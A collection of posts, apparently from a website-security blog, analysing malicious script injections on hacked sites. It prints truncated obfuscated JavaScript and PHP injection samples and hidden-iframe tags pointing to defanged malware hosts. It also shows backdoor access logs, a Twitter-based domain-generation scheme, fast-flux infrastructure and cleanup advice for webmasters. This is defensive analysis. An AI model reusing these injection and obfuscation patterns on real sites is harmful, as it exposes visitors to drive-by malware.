The attackers inject a malicious script into legitimate web pages on compromised sites and update the script several time a day (sometimes they change the script code and sometimes just make sure the script is still there, in case webmasters removed it). Typical scripts looks like this:

var $E=(Date);if($E){$f=['2*%0)%5}%1','%3{%b(%9_%8...skipped...(1))[$s.$Aj]($l[$0][$s.$1k](0,1));}}return this;},$3=$l(),$f='';$pi('l\x65\x6E\x67th');if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('s cript').length > 0){document.wr ite('<i frame src="'+document.getElementById('____Uy').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}

The scripts create invisible iframes that load malicious content from subdomains of ddns.name (ddns.name is a free dynamic DNS service). E.g.

<i frame src="hxxp://npputdzykop .ddns .name/index.php?showtopic=892380" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>

hxxp://bacmdmrnxdf .ddns .name/index.php?showtopic=892380
hxxp://hjuusnhqspt .ddns .name/index.php?showtopic=892380
hxxp://kmkyqilckhi .ddns .name/index.php?showtopic=892380
hxxp://npputdzykop .ddns .name/index.php?showtopic=892380
hxxp://jnobuznhccv .ddns .name/index.php?showtopic=892380
…

Last time I checked, the malicious subdomains pointed to 37.59.74.146.

When Google detects such malware on websites, you will see the following (or similar) messages on Safe Browsing diagnostic pages:

Malicious software is hosted on 7 domain(s), including hyyjkhfgmxk .ddns .name/, google-‐analytics .com/, kmkyqilckhi.ddns.name/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including google‐‐analytics .com/

Access log analysis

I had a chance to analyze access logs of one of the infected sites. Here’s what I found there:

During 24 hours, IP addresss 81.17.24.72 made 842 successful (response code 200) POST requests to backdoor files in 142 different locations on that server.

Some malicious requests:

81.17.24.72 - - [08/Feb/2012:16:11:37 -0500] "POST /e9a3.php HTTP/1.1" 200 41869 "-" "-"
81.17.24.72 - - [08/Feb/2012:17:45:12 -0500] "POST /e9a3.php HTTP/1.1" 200 460 "-" "-"
81.17.24.72 - - [09/Feb/2012:09:56:36 -0500] "POST /tmp/9ef4.php HTTP/1.1" 200 22467 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:04:21 -0500] "POST /...skipped.../images/9ef4.php HTTP/1.1" 200 22491 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:09:02 -0500] "POST /...skipped.../includes/admin/9ef4.php HTTP/1.1" 200 22499 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:07:29 -0500] "POST /...skipped.../modules/9ef4.php HTTP/1.1" 200 22492 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:30:13 -0500] "POST /public_html/...skipped.../wp-content/9ef4.php HTTP/1.1" 200 22484 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:35:29 -0500] "POST //public_html/...skipped.../wp-includes/9ef4.php HTTP/1.1" 200 22507 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:37:59 -0500] "POST /public_html/...skipped.../cgi-bin/9ef4.php HTTP/1.1" 200 22488 "-" "-"
81.17.24.72 - - [09/Feb/2012:13:01:09 -0500] "POST /public_html/...skipped.../wp-admin/9ef4.php HTTP/1.1" 200 22503 "-" "-"

Resolving the issue

As you can see, it not enough to remove malicious scripts from legitimate files. To prevent reinfections, you should also find and delete all backdoor files.

In this particular case, you might also want to block the IP 81.17.24.72. Most Control Panels provide an options to block requests from specific IPs. Alternatively, if you use Apache, you might want to add the following lines into the topmost .htaccess file

order allow,deny
deny from 81.17.24.72
allow from all

Find security hole

Actually, to stop this attack completely, you should figure out how the attacker managed to upload the backdoor files to your server in the first place. Unfortunately, I didn’t have access to historical logs of the compromised sites and couldn’t trace the beginning of the attack. If your site is affected by this hack and you have access logs for the last 2-4 weeks, I would love to hear from you.

At this point, I can suggest that you update all software on you server (including themes, plugins and component) and change all passwords. And don’t forget to regularly scan you server for suspicious content.

Update (Feb 16, 2012): I’ve managed to get FTP logs of the compromised site and now I’m confident that this attack uses stolen FTP credentials.

Here are some most representative lines from the logs:

...
Sun Feb 12 10:04:54 2012 0 81.17.24.72 2280 /home/username/db21.php b _ i r username ftp 1 * c
Sun Feb 12 10:27:58 2012 0 81.17.24.72 2280 /home/username/.autorespond/ca82.php b _ i r intern64 ftp 1 * c
Sun Feb 12 11:01:23 2012 0 81.17.24.72 2280 /home/username/.cpaddons/f041.php b _ i r username ftp 1 * c
Sun Feb 12 11:29:42 2012 0 81.17.24.72 2280 /home/username/.cpanel/a473.php b _ i r username ftp 1 * c
Sun Feb 12 11:54:51 2012 0 81.17.24.72 2280 /home/username/.htpasswds/3009.php b _ i r username ftp 1 * c
Sun Feb 12 12:41:48 2012 0 81.17.24.72 2280 /home/username/.trash/0fc4.php b _ i r username ftp 1 * c
Sun Feb 12 13:22:50 2012 0 81.17.24.72 2280 /home/username/cgi-bin/9e35.php b _ i r username ftp 1 * c
Sun Feb 12 13:58:39 2012 0 81.17.24.72 2280 /home/username/c7b0.php b _ i r username ftp 1 * c
...

In the logs, we see the notorious IP address 81.17.24.72 that uploads backdoor files to various directories on server. Later, the same 81.17.24.72 IP uses HTTP POST requests to the uploaded backdoors to infect legitimate files. It currently infects files that have the following strings in their filenames: index, default.

Once your FTP credentials are stolen, they can be sold to multiple hacker groups. That’s why it’s quite typical that a few gangs try to exploit the same site at the same time. In this case, I found traces of a couple of different attacks that also used the FTP vector.

For example, IPs “91.121.137.14“, “91.121.91.142” and “74.208.132.83” routinely uploaded files “extra.php” and “frame_cleaner.php” and then subsequently requested them via HTTP GET requests.

198.66.254.199 appended some code to wp-blog-header.php

216.183.83.126 injected cloaked spammy links into “header.php” of all WordPress themes and modified .htaccess files.

As you can see, many attacks use both stolen FTP credentials (to initially break into legitimate websites) and backdoor files (to control and reinfect websites even when webmasters change passwords). In this post, I showed how useful FTP and web server access logs can be to find security holes and malicious files.

Webmasters: do you have logs for your sites? If not, go and enable logging right now!

##
Your comments and any additional informations are welcome.

Similar posts:

• Ciscotred .cz .cc – Joomla Hack
• Dynamic DNS and Botnet of Zombie Web Servers
• Massive Script Injection (k985ytv)
• Introduction to Website Parasites

• Each domain was in use for a few hours only
• The next domain names would become available just a few hours before the malicious scripts on hacked sites begin to use them.

Since 2009, I’ve seen many revisions of that attack. It has never been the most prevalent issue but as far as I can tell it constantly evolves and mutates. The recent update of the malicious script injected by this attack looked quite interesting and I decided to find out what has changed since late 2009.

Malicious scripts

First of all, here’s the malicious script that was used in December (full version)

(function($$){qq2=[8,0,26,0,11,81,29,0,26,...skipped...87,73,78];qq21=[68,79,87,27,0,9,...skipped...39,7,9,10];function co(){return 'Code';}function gafu(){return a(String,'f'+ro()+co());}qq3=[94,39,7,9,10,94,...skipped...76,73];qq31=[84,8,7,7,0,19,...skipped...0,16,27,54];d='';mapper=[3,32,54,56,64,...skipped...24,0,25,0,26,0,27];map='';function fs(ro,arr,add){for(var i=0;i<arr.length;i++){ro+=String.fromCharCode(arr[i]+add);}return ro;}d=fs(d,qq2,32);d=fs(d,qq21,32);d=fs(d,qq3,32);d=fs(d,qq31,32);map=fs(map,mapper,32);function a(b,c){return b[c];};function ro(){return 'romChar';}for(c=55;c;d=(t=d.split(map.substr(c-=(x=c<9?1:2),x))).join(t.pop()));$$(d)})(fun ction(jsBb){return(function(jsB,jsBs){return jsBs(jsB(jsBs(jsB(jsBb))))(jsBb)()})((function(jsB){return jsB.constructor}),(function(jsB){return(function(jsBs){return jsB.call(jsB,jsBs)})}))});

It was a long obfuscated one-line script with long sequences of numbers. More or less, this is what those scripts always looked like. One line of a long obfuscated code, usually at the very bottom or very top of the HTML code of infected web pages.

On PHP sites, this script was injected in a form of an obfuscated PHP code (full version):

ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD4oZnVuY3Rpb24oJ...skipped...Sk7PC9zY3JpcHQ+');}

Quite a typical base64_decode obfuscation trick, although disguised by the security_update function name to make this code look more legitimate.

January 2012 code mutation

However in January, the code changed (it is still detectable by Unmask Parasites). Besides some algorithmic changes, the malicious script now consists of 78 lines of code generously sprinkled with comments in Latin!!! Here you can see the full version.

(function($$,_2,_1) {
function qq2(){return [89,75,80,70,81,89,16,73,78,81,...skipped...11,93,2,29,13,10,13,96,71,2,18,29,56];}
function co() { return 'Code';}
...skipped...
mapper = [5,34,56,58,66,96,62,2,2,2,3,2,6,2,7,2...skipped...27,2,28,2,29];
map = '';
function fs(ro, arr, add, st, en,dp) {
//Mauris gravida, libero ut tempor ultricies, ante erat blandit dui, vestibulum convallis ligula lacus et metus. Duis quis nunc justo, gravida sem
...skipped...
//lacus, tristique vitae aliquet a, ultrices nec libero. Aliquam sagittis enim in nibh semper tincidunt. Donec malesuada lorem sit amet risus euis
...skipped...
//modo, diam a placerat facilisis, magna libero mollis erat, in molestie nunc tellus consequat justo. Nulla ac nunc purus. Pellentesque habitant morbi
...skipped...
//et condimentum metus. Aliquam convallis auctor sapien, sit amet bibendum ligula condimentum ac. Vivamus blandit molestie enim vitae bland
...skipped...
//e feugiat. Etiam elit elit, hendrerit et varius non, molestie consectetur ipsum. Nullam sapien sem, mattis nec tempus non, elementum vitae ligula. Maur
...skipped...
})(function(jsBb) {
return (function(jsB, jsBs) {
return jsBs(jsB(jsBs(jsB(jsBb))))(jsBb)()
})((function(jsB) {
return jsB.constructor
}), (function(jsB) {
return (function(jsBs) {
//accumsan dapibus diam
...skipped...
});
/**/
gloa();

For some reason, hackers thought that comments in Latin would make their code look more legitimate, more reputable. But for me, the Latin comments were like a huge alert message — who would want to use Latin in JavaScript comments? It just doesn’t make sense.

Lorem Ipsum

Moreover, after some inspection, the Latin text appeared to be a random mixture of word from the classic “Lorem Ipsum” text. This text is used as a placeholder text in publishing and graphic design to have people focus on the visual presentation of elements rather than reading the text. But I doubt someone cares about visual presentation of a normally invisible html code and there is no point in providing comments if they are unreadable.

Making the attack sustainable

Anyway, this change in the formatting of the malicious script was probably one of the multiple tricks that aimed to improve the whole sustainability of the attack. In this case, they changed the code so that it doesn’t resemble a typical malicious script with a single line of an obfuscated code. The goal is to increase the infection period (time before a webmaster identifies the source of a problems and removes the script).

However malicious scripts on infected web pages is not the only thing that contributes to success of an attack. Most drive-by attacks rely on some third-party malicious sites where malware is being actually loaded from. Such sites have domain names and IP addresses that can be easily blacklisted by antivirus software, browsers and firewalls — this can significantly affect the attack performance. Moreover, authorities can suspend offending domains and request hosting providers to shut down malicious sites and whole servers. This attack uses several interesting solutions to address such threats.

Generating domain names on the fly

To avoid blacklisting, hackers have to frequently change domain names of their malware distributing websites. This particular attack rather than regularly updating injected scripts to use new links to malware sites, uses Twitter API (trends) and a clever algorithm to generate new pseudo-random domain names of attack sites on the fly.

It’s a new version of the algorithm that I described two years ago. Here’s an overview of this new algorithm.

1. It uses Twitter API (http://api.twitter.com/1/trends/daily.json) to get a list of trending topics that were hot two days ago.
2. Depending on the current time, it extracts the fourth topic from the list of trends for one of the following hours: 01:00, 07:00, 13:00 or 19:00 (in some rare cases they may use 02:00, 08:00, 14:00 or 20:00)
3. The extracted trending topic is used as a key in a domain name generating algorithm.
4. The algorithm just returns a permutation of characters in the key and uses the first 10-13 of them as a new domain name.
5. To address edge cases where a trending topic is less than 10 characters long and to improve the random nature of permutations, they append the word “microscope” to the trending topic before applying the algorithm.
6. As a result, the algorithm generates domain names like: dgeocanyaf .com, ocooecunrpbn .com, snrrstrcocri .com (more domain names here), that change every 6 hours. The attackers have almost two days to register them (they register them just a few hours before the use though).
7. Then the script builds a URL of a malicious page, adding the “/index.php?tp=001e4bb7b4d7333d” path to the generated domain names. The resulting URL is used to create an invisible iframe that pushes exploits to web browsers of people who visit infected web pages.

The benefit of this approach is the attack can easily survive if some domain is blocked or unavailable for some reason — it only means not more than 6 hours of downtime. On the other hand, if someone reverse engineers the algorithm (like I did) they can use the same algorithm to blacklist or sinkhole the domain names before they become malicious.

So what’s new comparing to that two year old version of the attack?

The main differences from the previously described algorithm, are:

1. Hardcoded year 2012. This proves that the attack is still active and the attackers don’t want to abandon this Twitter based approach to generate domain names.

2. Instead of just 2 domains, they generate and use 4 new domains every day, and change them every 6 hours.

3. The domain generating algorithm no longer uses predefined suffixes for the generated domains. They used to have 12 month-specific predefined suffixes that helped easily identify the attack when you knew where the infected page tried to load the malicious content from. The current algorithm generates completely random domain names that don’t have any easily identifiable parts that can help classify them as belonging to this attack.

Online Demo

To show how this domain generating algorithm works, I’ve create an online tool that uses the same algorithm to predict malicious domains in real time. It shows 4 today’s malicious domains and predicts 4 domains that should be used by the attack tomorrow (more or less, depending on your time zone).

To make it more informative, I’ve provided two links for each domain name

1. Whois — to show whether the domain is registered and if it is then show who and when registered it (in most cases you’ll see the current date)
2. Google’s Safe Browsing diagnostic — to show whether Google has already picked up the malicious domain (this usually happens by the end of the 6-hour lifespan of that domain)

Just to make this tool a little bit less boring, each domain name is accompanied by a corresponding Twitter trending topic that was used to generate that domain name.

For example, as I write this article on January 25th, the current malicious domain is “dgeocanyaf .com” and the corresponding Twitter trending topic from January 23rd is “Happy Year of the Dragon“. The domain was registered on January 25th, 2012 and Google already lists it as suspicious.

The upcoming malicious domain is “epljsxiomccg .com” and the corresponding Twitter topic is “Judge Alex“. The domain is already registered but Google doesn’t list it as suspicious (no wonder – it is not active yet).

The first predicted domain for January 26th (GMT time zone) is “mrrcatsphmoin .com” and the corresponding trending topic from January 24th is “Mr. and Mrs. Smith“. This domain is not registered yet (it should be by the time when you read this article) and Google doesn’t know about it yet.

If you are interested in the code of the algorithm, you can check the source code of the web page of this online tool.

OnlineNIC Domain Resellers

If you analize the Whois information for those domains, you can see that they all have been registered via OnlineNIC Inc. To register domains, the attackers used a few supposedly fake accounts – all of them marked as “reseller“.

So what does it mean to be an OnlineNiC’s domain reseller?

1. Anyone can register to be a reseller. The prices begin from $94 of prepayment (you can use them later to purchase domains).

2. OnlineNIC provides “an API/template system to make it a snap for you to get started. In a matter of minutes, you can easily integrate private-labeled real-time domain name registration services right into your own Web site!”

So what is that API? According to the documentation: “The application program interface (API) is a set of routines and criterion and protocols by OnlineNIC. … It makes you and your client easier to
complete products purchase, management, and info-query and so on via API.”

Here are just a few things that this API allows to do:

• Check domain availability
• Register domain
• Create Name Servers
• Update domain Name Servers

So, resellers can use this API to create a program that will automatically purchase and manage domains. That’s a perfect solution for this attack, isn’t it?

DNS-DIY

The reseller account comes with free DNS-DIY DNS service that allows to manage A records and customize Name Servers (“Add the domain which you are using as dns at www.DNS-DIY.net, then create CNAME Records for ns1.yourcompany.com and ns2.yourcompany.com so that they can be pointed to ns1.DNS-DIY.net and ns2.DNS-DIY.net.” – that’s why you can see ns(1|2).malicious-domain.com as Name Servers of those malicious domains in Whois) There should be no surprise that DNS-DIY has an API too — so all operations can be automated.

Zombie-computers as fast flux hosting

The DNS-DIY API is used for a good reason. Not only do the attackers need it to initially configure new domains to point to certain servers, but they also use it to avoid taking down the malware distributing servers.

This attack uses a technique called Fast flux hosting (if I use this term correctly). Here’s how it works.

When the attackers register a new domain, they create two A records for each domain. This means that each domain points to two different IPs and it’s up to your DNS software which of them to use.

These two A-records help achieve two goals:

• load balancing – the traffic is split between two servers
• if one server is shut down or unavailable for some reason, the other server will still be processing requests.

However, it is not the most interesting thing in the fast-flux scheme. After all, the second server can be shut down too. The most interesting thing is how the attackers choose which two IPs to use in A records.

The thing is the IP addresses in the A records change every 6 hours, the same way as they change the domain names used in this attack.

Here is a list of 120 unique IP addresses that I collected over the last few days (not only did they use them for new domains but also updated A records of some older domains). The analysis of those IPs shows that they all belong to IP blocks of cable, broadband and even wireless ISPs from all around the world:

• Australia Melbourne Telstra Internet
• Austria Linz Liwest Kabelfernsehen Errichtungs- Und Betriebs Ges.m.b.h
• Austria Vienna Oebb Telekom Service Gmbh
• France Paris Free Sas
• Germany Kabel Deutschland Breitband Service Gmbh
• Germany Leipzig Primacom Berlin Gmbh
• Italy Chieti Telecom Italia S.p.a
• Italy Telecom Italia Mobile
• Netherlands Amsterdam Upc Broadband Operations B.v,
• Netherlands Barneveld Matrix Pc B.v
• Philippines Makati Pldt
• Poland Telewizja Kablowa Kolobrzeg Agencja Uslugowo – Reklamowa Sp. Z O.o
• United States Richmond Comcast Cable Communications Inc
• United States Houston AT&T Internet Services
• United States Kyle Road Runner Holdco Llc
• Venezuela, Bolivarian Republic Of Barquisimeto Internet Cable Plus C. A,
• and many more …

This proves that instead of real web servers, the malicious domains point to infected computers of normal web surfers, so called bots or zombie-computer. This approach is not new. For example, two years ago I described how Koobface used web servers on infected PCs.

Nginx reverse proxies

If you check HTTP header of responses from the malicious sites, you’ll notice that they all have the same “Server: nginx/0.7.65; X-Powered-By: PHP/5.3.2-1ubuntu4.10” headers.

Although the headers suggest that the remote computer runs Ubuntu Linux distribution, it is hard to believe that hackers found so many vulnerable Ubuntu workstations all over the world connected to the Internet via regular ISP services. Moreover, they all have the same versions of Ubuntu, PHP and Nginx.

The answer to this is Nginx. This is a popular web server known to easily handle large volumes of traffic. It is popular within cyber criminals both for its ability to reliably work under heavy load and for it’s reverse-proxy feature that helps to hide the real malware distributing server behind the layer of proxies.

The most probable scenario

Cyber criminals have a program on a C&C (command and control) server that is scheduled to do the following things:

1. Use their domain generating algorithm and the OnlineNIC API to register a new domains.
2. Then ping their botnet and identify a few zombie-computers with reliable Internet connections and public IP addresses.
3. Using the DNS-DIY API, setup DNS records for the new domain. Specifically create two A records that point to two zombie-computers selected in the step 2.
4. For some older domains, update A records with new IPs selected in the step 2.
5. For more old domains, remove one A record and point the other to 127.0.0.1 or remove it altogether (dispose of the domain)
6. There is an Nginx web server on every zombie-computer. (There is a Windows version of Nginx) that processes requests to malicious URLs (hxxp://malicious-domain .com/ index.php?tp=001e4bb7b4d7333d)
7. Nginx servers on zombie-computers work in a reverse proxy mode. They transmit every request to some remote server that actually distributes the malware and then return that server’s response back to clients (in our case to web browsers that loaded infected web pages). The “PHP/5.3.2-1ubuntu4.10″ header is actually from that remote server (reverse proxies pass most headers from the proxied servers).

Counter measures

It is clear that the attack constantly evolves and changes but given its current state it is possible to identify its weak sides and suggest some counter measures.

1. Hijack the domain generating algorithm. Interested parties can blacklist domains before they turn malicious (or at the very moment) or register them before the criminals do it. Of course, the algorithm will change, but it doesn’t take long to reverse engineer it and it will take quite some time for hackers to update their infrastructure to use a new algorithm and update the malicious code on all infected web pages.
2. Have OnlineNIC close the reseller accounts that the cyber criminals used for registering those domain names. If you check the Whois records of the domains, you’ll see that they were registered using the same few accounts (some of them). Of course, it is possible to register new reseller accounts, but if OnlineNIC agrees to cooperate, it will be easy to close rogue accounts as soon as they begin register new malicious domains. It is clear, that the attack infrastructure relies on APIs of OnlineNIC and DNS-DIY, so if they can’t use them it may disrupt the attack.
3. Don’t let the parasites use your resources. Keep your computers and websites malware-free.

I can’t tell for sure how exactly the malicious code is being injected into legitimate web pages (I couldn’t find webmasters of infected sites who would want to help me in my investigation :( ), but I see some signs that the attack could use stolen FTP credentials. If this is true, webmasters should thoroughly scan they computers for malware, change all site passwords (and refrain from saving them in FTP clients) and then remove the malicious code from files on server.

Update (Feb 18, 2012): Thanks to foks, I’ve received some very interesting information about this attack. Please read the update here. Some highlights of what you will find there:

• Confirmed FTP attack vector.
• google_verify.php and auto_append_file trick in .htaccess.
• New buggy version of the malicious script.
• Detailed clean up instructions.

##

Additional information and your comments are welcome.

Similar posts:

• Lorem Ipsum and Twitter Trends in Malware. Update.
• Hackers Use Twitter API To Trigger Malicious Scripts
• Twitter API Still Attracts Hackers
• How Criminals Defend Their Rogue Networks – abuse.ch
• Introduction to Website Parasites

Video highlights:

1. Use Safe Browsing diagnostics — false positives are very unlikely
   http://www.google.com/safebrowsing/diagnostic?site=<your-site-URL-here>
   
   • The problem might have been caused by a third-party content (ads, widgets) that you use on your site
   • But in most cases the problem is in the malicious content/behavior added by hackers.
2. Malware review via Google Webmaster Tools.
   • prove ownership
   • use the  Diagnositics -> Malware section for information on malware issues (e.g. examples of URL were malware was found, and samples of the found malicious content)
   • Once you fix the problem, click on the “request a review” link — your site will be reviewed during the next few hours.
3. Fetch as Googlebot. – useful tool to diagnose security problems when hackers hide malicious content from normal human visitors and only show it for search engine spiders (cloaking) — this is quite a prevalent type of website hacks (part of massive Black Hat SEO campaigns).
4. .htaccess — is a popular target of website hacks. For example, hackers can add conditional rules to redirect all search engine traffic to a third-party website.
5. SQL-injections — another trick where hackers can exploit bugs in web applications that fail to properly sanitize user input — as a result, malicious content can be injected into site’s database.
6. Finding malware may be tricky.
   • Don’t only check the source code of your web pages. Check what browsers receive from your web server (both the page code and the HTTP headers).
   • You might want to play with different scenarios. Warning: please use specialized tools and do it only in a controlled sandboxed environment, otherwise malware may infect your computer.
     • direct visit
     • visit from a search engine
     • visit with clean cookies (first time visit)
     • visit using different browsers (IE, Firefox, Chrome)
     • visit from from different IPs and countries
7. Keep your system up to date.
8. Change passwords.
9. Unmask Parasites :) -  Matt called this site a “really useful place to talk about all the different attacks that are currently going on”.

It has been a while since the last Tweet Week. The main reason is I don’t tweet that often now to post my tweets every week and I don’t want to post old news here either.

So what happened? The answer is I can’t get used to Twitter web interface – it is so inconvenient. I had to use it when I had some strange problems with my Twitter client (twhirl). Thank’s god, I’ve finally made my twhirl work so I hope I will be able to tweet more often.

Anyway, here are some of the latest tweets.

November 15, 2011

[h-online] Joomla! updates close security holes – attackers can change Joomla passwords. Upgrade ASAP

[seoarmada com au] Webmaster’s story about how the recent WordPress attack affected his four sites

November 9, 2011

Unmask Parasites is on Google+ now — I’ll post things that are too long for Twitter and too short for blog

November 3, 2011

[TheRegister] Thousands of WordPress sites commandeered by Black Hole — not sure why it mentions my older article (G+)

November 2, 2011

Google will selectively crawl resources behind POST requests

October 31, 2011

RT @stopbadware: In May, @unmaskparasites discussed canonical hacks on our blog. Google announces protection today.

October 30, 2011

Mozilla updated my “Readable SafeBrowsing” extension to v0.2.5. — if you use FireFox and read SafeBrowsing diagnistic pages

October 26, 2011

[h-online] MyBB downloads were infected — download package for MyBB v1.6.4 contained a backdoor

October 21, 2011

[armorize] “jighui /urchin.js” script injection on ASP.NET sites. — Did hackers confused Breton with Brazilian?

If you want more real-time experience, you can follow @UnmaskParasites on Twitter or circle Unmask Parasites on Google +.

Related posts:

• Previous Tweet Weeks

<img src="http://example .net/images/logos/rssicon.png" />

So why did Google think this image tag was malicious? Can images be malicious? After all they are not scripts, iframes or embedded executable objects that that hackers use to attack web surfers.

It turns out, images can really make Google blacklist your site. In that particular case, the image was from a third party site and it was (as its name suggests) just an RSS icon. A normal legitimate file. The only problem was the third party site got hacked and attackers modified its .htaccess file to redirect search traffic to malicious sites (like here). Subsequently, that “example. net” got flagged by Google.

Cross-site warnings

Sometimes it’s enough for your site just to load something from a blacklisted site to get a warning. For example, Google Chrome has so called “cross-site warnings“. When you open a website that is not currently blacklisted, Chrome can detect (in real time) that a page loads something (usually scripts or iframes) from a known blacklisted site. In this case you will see the infamous red malware warning. The only difference from a normal warning will be the words that “website at <your website> contains elements from the site <third party site>, which appears to host malware…“.

These cross-site warning only (reliably) work in Google Chrome. And since websites that contain elements from malicious site are not blacklisted at the moment, there will be no malware warnings in Webmaster Tools (until Google discovers malware on your site). So the webmaster couldn’t find that code in Webmaster Tools if that was just a cross-site warning.

Broken links can be dangerous too

Let’s get back to that hacked site. It’s .htaccess file also contained rules to redirect all erroneous requests (e.g. requests with error codes 404 Not Found, 400 Bad Request, 401 Unauthorized, 403 Forbidden and 500 Internal Server Error ) to malicious sites. In our case, that rssicon.png file was missing for some reason, thus requests to this file returned the 404 error code and got redirected to a bad site.

So every time when someone loads a page with that img tag, behind the scenes, one browser request goes to a malicious site. This is probably what Google malware scanners detected and this was the reason for flagging that website with the rssicon.png img tag.

Images in third party widgets

Another real world example is the current problem with Blogger blogs that use some fishy “page views counter widget” from bloggerwidgets .cz .cc. Google says, this site has infected 169 blogs.

All infected site has the following “counter widget” code
<img src="http://forums .bit-tech .net/images-light/misc/stats.gif" alt="" width="16" height="16" />
<img src="hxxp://demo .bloggerwidgets .cz .cc/counter2.php?page=xxxxxxxxxxxxxxxxxxx&amp;digit=4" alt="counter" />

As you can see, this code loads an image from demo .bloggerwidgets .cz .cc. I guess it is supposed to display views count. However, the “bloggerwidgets .cz .cc” domain seems to be discontinued and now redirects all requests to a scam site.

Are those images malicious?

Can those images from hacked/redirecting sites be really dangerous for visitors to a site that embeds the images via an <img> tag? Well, I think such tags are “mostly harmless” ;) Modern browsers seem to correctly handle such redirections and simply don’t process server responses in unsupported formats (the malicious redirect returns some HTML code where an image is expected). But who knows, maybe some older browsers under certain conditions may misinterpret the scope of the redirection and navigate a browser to a bad site (after all this is what browser exploits are all about — they allow to do undocumented stuff).

To webmasters

Anyway, whats’ more important for webmasters is that image tags can really be the source of malware warnings.

So here are some basic tips on how to deal with such situations:

1. Where possible, don’t use images and other resources (e.g. scripts, objects, etc) from third-party sites. You might want to copy the files to your own server (if their license permits this).

2. If you have to embed resources from third party sites (counters, widgets, ads), check how trustworthy and reputable they are (e.g. compare Facebook widget and the “bloggerwidgets .cz .cc” widget).

3. If Google blacklists your site and mentions some <img> tag as the source of the problem, you should remove that tag (or replace the image with some placeholder with similar dimensions to preserve page formatting) from all pages and then request a malware review via Google Webmaster Tools.

4. In case you don’t see any samples of malicious code in Webmaster Tools (for example, if you haven’t registered your site with Webmaster Tools yet) you might want to check Google’s Safe Browsing diagnostic page for your site:

http://www.google.com/safebrowsing/diagnostic?site=example.com

Just replace “example.com” with your site domain.

On the diagnostic page, check domains mentioned in the “What happened when Google visited this site?” section. If your site links to some images on those domains you need to remove them before requesting a malware review.

5. If you really want to use those images on your site, you should contact the owners of the sites they reside on and ask to clean them up and have Google unblock them. Once those third party websites are clean you can link to their images again.

Note, the above instructions only apply to situations when Google blacklists your site because of the <img> tags that you added to your site yourself. If you find some image tags or other HTML code that don’t belong to your site and you never added them yourself, this will be a whole different story that requires different remediation steps (for example, the most important step will be to figure out how that alien code was injected into your web pages.)

Related posts:

• Practical Guide to Dealing With Google’s Malware Warnings
• Htaccess Redirect to Example.ru/dir/index.php
• Readable SafeBrowsing Add-on for Firefox 4+
• Introduction to Website Parasites